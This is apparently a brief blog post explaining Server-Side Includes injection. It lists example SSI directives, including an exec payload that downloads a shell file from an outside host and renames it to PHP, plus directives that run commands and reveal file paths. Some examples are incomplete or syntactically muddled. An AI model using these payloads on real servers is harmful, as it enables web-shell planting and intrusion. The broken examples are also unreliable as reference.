The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.
SSIs are directives present on Web applications used to feed an HTML page with dynamic contents.
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives
like: < ! # = / . " - > and [a-zA-Z0-9]
Some examples of Server Side Includes are:
List files of directory:
Access directories: <!--#exec cmd="cd /root/dir/">
Execution script: <!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
To change the error message output:
<!--#config errmsg="File not found, informs users and password"-->
To show current document filename: <!--#echo var="DOCUMENT_NAME" -->
To show virtual path and filename: <!--#echo var="DOCUMENT_URI" -->
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format: <!--#config timefmt="A %B %d %Y %r"-->
Using the “fsize” command, it is possible to print the size of selected file: <!--#fsize file="ssi.shtml" -->
To observe server side includes vulnerability
click on the below link(you have to create an account to check the vulnerability
observe vulnerability
No comments:
Post a Comment